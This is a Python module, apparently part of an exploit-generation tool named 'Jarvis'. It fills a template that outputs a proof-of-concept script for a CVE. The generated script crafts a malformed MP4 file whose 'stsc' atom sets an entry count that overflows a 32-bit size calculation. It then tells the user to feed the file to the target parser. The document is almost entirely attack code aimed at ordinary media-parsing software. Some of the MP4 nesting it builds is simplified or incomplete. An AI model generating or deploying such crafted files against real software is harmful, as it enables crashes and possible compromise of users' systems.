"""Integer overflow exploit template for Jarvis."""
import struct
from typing import Dict, Any


def render_integer_overflow(vuln: Dict[str, Any]) -> str:
    trigger = vuln.get("trigger_primitives", {})
    overflow_val = trigger.get("overflow_value", "0x40000000")
    entry_count = trigger.get("entry_count", "0x40000000")
    entry_size = trigger.get("entry_size", 12)
    target = vuln.get("target", "target_binary")
    cve_id = vuln.get("cve_id", "CVE-XXXX-XXXX")
    description = vuln.get("description", "")
    file_struct = vuln.get("target_file_structure")
    vuln_atom = file_struct.get("vulnerable_atom", "stsc") if file_struct else "stsc"
    output_file = "poc_" + cve_id.replace("-", "_").lower() + ".bin"

    code = '#!/usr/bin/env python3\n'
    code += '"""Integer overflow PoC for ' + cve_id + '\n'
    code += 'Target: ' + target + '\n'
    code += 'Description: ' + description + '\n'
    code += '\n'
    code += 'The overflow: ' + entry_count + ' * ' + str(entry_size) + ' = 0x' + format(int(entry_count, 0) * entry_size, 'X') + '\n'
    code += 'This exceeds 32-bit integer space, wrapping to 0x' + format((int(entry_count, 0) * entry_size) & 0xFFFFFFFF, '08X') + '.\n'
    code += '"""\n'
    code += 'import struct\n'
    code += 'import sys\n'
    code += 'import os\n\n\n'
    code += 'class MP4Atom:\n'
    code += '    """Standard MP4 atom: [size:4][type:4][payload]"""\n\n'
    code += '    def __init__(self, atom_type: bytes, payload: bytes):\n'
    code += '        self.atom_type = atom_type\n'
    code += '        self.payload = payload\n\n'
    code += '    def build(self) -> bytes:\n'
    code += '        size = len(self.payload) + 8\n'
    code += '        return struct.pack(">I", size) + self.atom_type + self.payload\n\n\n'
    code += 'class MP4Container:\n'
    code += '    """Build nested MP4 container hierarchy."""\n\n'
    code += '    def __init__(self):\n'
    code += '        self.children = []\n\n'
    code += '    def add(self, atom_type: bytes, payload: bytes):\n'
    code += '        self.children.append(MP4Atom(atom_type, payload))\n'
    code += '        return self\n\n'
    code += '    def build(self) -> bytes:\n'
    code += '        return b"".join(child.build() for child in self.children)\n\n\n'
    code += 'class StscExploit:\n'
    code += '    """Construct the stsc atom that triggers the integer overflow.\n\n'
    code += '    num_entries = ' + entry_count + '\n'
    code += '    entry_size = ' + str(entry_size) + '\n'
    code += '    Overflow: ' + entry_count + ' * ' + str(entry_size) + ' = 0x' + format(int(entry_count, 0) * entry_size, 'X') + '\n'
    code += '    """\n\n'
    code += '    def __init__(self):\n'
    code += '        self.num_entries = ' + entry_count + '\n'
    code += '        self.entry_size = ' + str(entry_size) + '\n\n'
    code += '    def build_payload(self) -> bytes:\n'
    code += '        payload = struct.pack(">I", self.num_entries)\n'
    code += '        for i in range(min(4, self.entry_size)):\n'
    code += '            payload += struct.pack(">III", 1, 1, 1)\n'
    code += '        return payload\n\n'
    code += '    def calculate_overflow(self) -> int:\n'
    code += '        raw = self.num_entries * self.entry_size\n'
    code += '        return raw & 0xFFFFFFFF\n\n\n'
    code += 'def build_ftyp() -> bytes:\n'
    code += '    return MP4Atom(b"ftyp", b"isom" + b"\\x00" * 4 + b"isomiso2").build()\n\n\n'
    code += 'def build_stsc() -> bytes:\n'
    code += '    exploit = StscExploit()\n'
    code += '    return MP4Atom(b"stsc", exploit.build_payload()).build()\n\n\n'
    code += 'def build_stsd() -> bytes:\n'
    code += '    return MP4Atom(b"stsd", b"\\x00" * 8 + b"mp4v" + b"\\x00" * 40).build()\n\n\n'
    code += 'def build_stts() -> bytes:\n'
    code += '    return MP4Atom(b"stts", b"\\x00" * 8).build()\n\n\n'
    code += 'def build_stsz() -> bytes:\n'
    code += '    return MP4Atom(b"stsz", b"\\x00" * 12).build()\n\n\n'
    code += 'def build_stco() -> bytes:\n'
    code += '    return MP4Atom(b"stco", b"\\x00" * 8).build()\n\n\n'
    code += 'def build_stbl() -> bytes:\n'
    code += '    return b"".join([build_stsd(), build_stts(), build_stsc(), build_stsz(), build_stco()])\n\n\n'
    code += 'def build_mdia() -> bytes:\n'
    code += '    return (\n'
    code += '        MP4Atom(b"mdhd", b"\\x00" * 16).build()\n'
    code += '        + MP4Atom(b"hdlr", b"\\x00" * 8 + b"vide" + b"\\x00" * 20).build()\n'
    code += '        + MP4Container().add(b"minf", b"\\x00" * 8 + build_stbl()).build()\n'
    code += '    )\n\n\n'
    code += 'def build_trak() -> bytes:\n'
    code += '    return MP4Atom(b"tkhd", b"\\x00" * 16).build() + MP4Atom(b"mdia", build_mdia()).build()\n\n\n'
    code += 'def build_moov() -> bytes:\n'
    code += '    return MP4Atom(b"mvhd", b"\\x00" * 16).build() + MP4Atom(b"trak", build_trak()).build()\n\n\n'
    code += 'def main():\n'
    code += '    output = "' + output_file + '"\n'
    code += '    ftyp = build_ftyp()\n'
    code += '    moov = build_moov()\n'
    code += '    data = ftyp + moov\n\n'
    code += '    with open(output, "wb") as f:\n'
    code += '        f.write(data)\n\n'
    code += '    size = os.path.getsize(output)\n'
    code += '    print(f"[+] Generated {output} ({size} bytes)")\n'
    code += '    print(f"[+] Overflow trigger: ' + entry_count + ' * ' + str(entry_size) + ' = 0x' + format(int(entry_count, 0) * entry_size, 'X') + '")\n'
    code += '    print(f"[+] Wrapped 32-bit: 0x' + format((int(entry_count, 0) * entry_size) & 0xFFFFFFFF, '08X') + '")\n'
    code += '    print(f"[+] Vulnerable atom: ' + vuln_atom + '")\n'
    code += '    print(f"[*] Feed this file to the target parser to trigger the integer overflow")\n\n\n'
    code += 'if __name__ == "__main__":\n'
    code += '    main()\n'

    return code
